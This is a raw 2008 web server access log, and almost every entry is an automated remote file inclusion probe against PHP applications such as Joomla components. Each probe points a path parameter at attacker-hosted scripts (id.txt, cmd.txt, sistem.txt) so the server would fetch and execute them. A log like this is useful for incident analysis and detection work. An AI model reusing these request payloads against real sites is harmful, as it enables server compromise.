85.25.146.28 - - [07/Aug/2008:09:34:32 -0700] "GET /logs/access_080215.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:09:34:32 -0700] "GET /logs/access_080219.log/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:09:34:33 -0700] "GET /logs/access_080219.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:09:34:33 -0700] "GET /logs/access_080311.log/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:09:34:34 -0700] "GET /logs/access_080311.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
59.106.19.213 - - [07/Aug/2008:09:34:35 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.cepeduc.com/cepa/images/M.images/idscan8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:09:34:35 -0700] "GET /logs/access_080214.log/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
59.106.19.213 - - [07/Aug/2008:09:34:36 -0700] "GET /logs/access_080226.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.cepeduc.com/cepa/images/M.images/idscan8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:09:34:36 -0700] "GET /logs/access_080214.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:09:34:37 -0700] "GET /logs/access_080212.log/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:09:34:37 -0700] "GET /logs/access_080212.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
59.106.19.213 - - [07/Aug/2008:09:34:38 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.cepeduc.com/cepa/images/M.images/idscan8?? HTTP/1.1" 200 18545 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:34:51 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:34:56 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
147.144.1.212 - - [07/Aug/2008:09:35:01 -0700] "GET /logs//components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
147.144.1.212 - - [07/Aug/2008:09:35:01 -0700] "GET /logs//components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
147.144.1.212 - - [07/Aug/2008:09:35:01 -0700] "GET //components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
147.144.1.212 - - [07/Aug/2008:09:35:01 -0700] "GET //components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
59.106.19.213 - - [07/Aug/2008:09:35:12 -0700] "GET /logs/access_080229.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.cepeduc.com/cepa/images/M.images/idscan8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:09:35:19 -0700] "GET /logs/access_080331.log/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:09:35:19 -0700] "GET /logs/access_080331.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
74.52.19.154 - - [07/Aug/2008:09:35:20 -0700] "GET ///?mosConfig_absolute_path=http://superspeedlearning.com/test.txt? HTTP/1.1" 200 18417 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
147.144.1.212 - - [07/Aug/2008:09:35:21 -0700] "GET /logs//components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
147.144.1.212 - - [07/Aug/2008:09:35:21 -0700] "GET //components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
62.44.72.170 - - [07/Aug/2008:09:35:22 -0700] "GET /logs/access_080107.log//index.php?option=com_joomlaxplorer&action=show_error&dir=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.52.19.154 - - [07/Aug/2008:09:35:29 -0700] "GET /logs///?mosConfig_absolute_path=http://superspeedlearning.com/test.txt? HTTP/1.1" 200 59574 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
65.55.211.39 - - [07/Aug/2008:09:35:30 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.39 - - [07/Aug/2008:09:35:31 -0700] "GET /logs/access_080408.log HTTP/1.1" 304 - "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:09:35:32 -0700] "GET /logs/access_080505.log/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:09:35:32 -0700] "GET /logs/access_080505.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
63.208.74.34 - - [07/Aug/2008:09:35:48 -0700] "GET /logs//components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.208.74.34 - - [07/Aug/2008:09:35:48 -0700] "GET //components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.208.74.34 - - [07/Aug/2008:09:35:58 -0700] "GET /logs//components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.208.74.34 - - [07/Aug/2008:09:35:58 -0700] "GET //components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.26.63.13 - - [07/Aug/2008:09:35:59 -0700] "GET /logs//components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.208.74.34 - - [07/Aug/2008:09:36:00 -0700] "GET /logs//components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.208.74.34 - - [07/Aug/2008:09:36:00 -0700] "GET //components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:36:00 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:36:00 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:36:02 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
64.26.63.13 - - [07/Aug/2008:09:36:02 -0700] "GET /logs//components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.26.63.13 - - [07/Aug/2008:09:36:04 -0700] "GET //components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.26.63.13 - - [07/Aug/2008:09:36:04 -0700] "GET //components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:36:23 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:36:29 -0700] "GET /logs/access_080226.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:36:29 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:36:29 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
63.208.74.34 - - [07/Aug/2008:09:36:33 -0700] "GET /logs//components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.208.74.34 - - [07/Aug/2008:09:36:33 -0700] "GET //components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.49.28.184 - - [07/Aug/2008:09:36:36 -0700] "GET /logs/access.log%20/modules/xfsection/modify.php?dir_module=http://81.169.165.90/indo/dosiris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.162.215.10 - - [07/Aug/2008:09:36:38 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.rhemachristianschool.org/modules/banner.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.162.215.10 - - [07/Aug/2008:09:36:38 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.rhemachristianschool.org/modules/banner.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [07/Aug/2008:09:36:40 -0700] "GET /inc/header.php/step_one.php?server_inc=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:09:37:01 -0700] "GET /logs/access_080322.log/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:09:37:01 -0700] "GET /logs/access_080322.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:09:37:01 -0700] "GET /logs/access_080217.log/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:09:37:02 -0700] "GET /logs/access_080217.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:09:37:03 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/maros_cool/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:09:37:03 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/maros_cool/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:09:37:04 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/maros_cool/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:09:37:10 -0700] "GET /logs/access_080513.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:37:15 -0700] "GET /logs/access_080226.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:37:15 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:37:15 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
84.22.143.171 - - [07/Aug/2008:09:37:27 -0700] "GET /logs/access_080122.log/errors.php?error=http://adecova.com/descargas/babih.pdf1/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:09:37:27 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/maros_cool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:09:37:28 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/maros_cool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:09:37:28 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/maros_cool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:09:37:29 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/maros_cool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:09:37:29 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/maros_cool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:09:37:30 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/maros_cool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:09:37:30 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/maros_cool/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:09:37:31 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/maros_cool/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:09:37:31 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/maros_cool/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:09:37:42 -0700] "GET /logs/access_080320.log%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
58.102.118.201 - - [07/Aug/2008:09:37:59 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [07/Aug/2008:09:37:59 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [07/Aug/2008:09:37:59 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [07/Aug/2008:09:37:59 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [07/Aug/2008:09:37:59 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [07/Aug/2008:09:37:59 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.151.242 - - [07/Aug/2008:09:37:59 -0700] "GET /logs/inc/header.php/step_one.php?server_inc=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [07/Aug/2008:09:37:59 -0700] "GET /inc/header.php/step_one.php?server_inc=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
58.102.118.201 - - [07/Aug/2008:09:37:59 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [07/Aug/2008:09:37:59 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [07/Aug/2008:09:37:59 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.24.242 - - [07/Aug/2008:09:38:09 -0700] "GET /logs/access_080124.log//components/com_simpleboard/image_upload.php?sbp=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.44.72.170 - - [07/Aug/2008:09:38:20 -0700] "GET /logs/access_080312.log//index.php?option=com_joomlaxplorer&action=show_error&dir=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.125.143.162 - - [07/Aug/2008:09:38:23 -0700] "GET /logs/access_080309.log/index3.php?d=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.143.162 - - [07/Aug/2008:09:38:23 -0700] "GET /index3.php?d=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.143.162 - - [07/Aug/2008:09:38:23 -0700] "GET /logs/index3.php?d=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.143.162 - - [07/Aug/2008:09:38:23 -0700] "GET /logs/access_080215.log/index3.php?d=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:38:26 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.224.152.230 - - [07/Aug/2008:09:38:28 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:38:32 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:38:32 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:38:32 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:38:34 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:38:34 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:38:37 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:38:38 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:38:39 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:38:39 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:09:38:43 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/maros_cool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.203.121.1 - - [07/Aug/2008:09:38:45 -0700] "GET /logs/access_080226.log//components/com_simpleboard/image_upload.php?sbp=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.203.121.1 - - [07/Aug/2008:09:38:45 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.203.121.1 - - [07/Aug/2008:09:38:45 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.203.121.1 - - [07/Aug/2008:09:38:46 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:09:38:48 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/maros_cool/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:09:38:49 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/maros_cool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:09:38:58 -0700] "GET /logs/access_080312.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:09:38:58 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
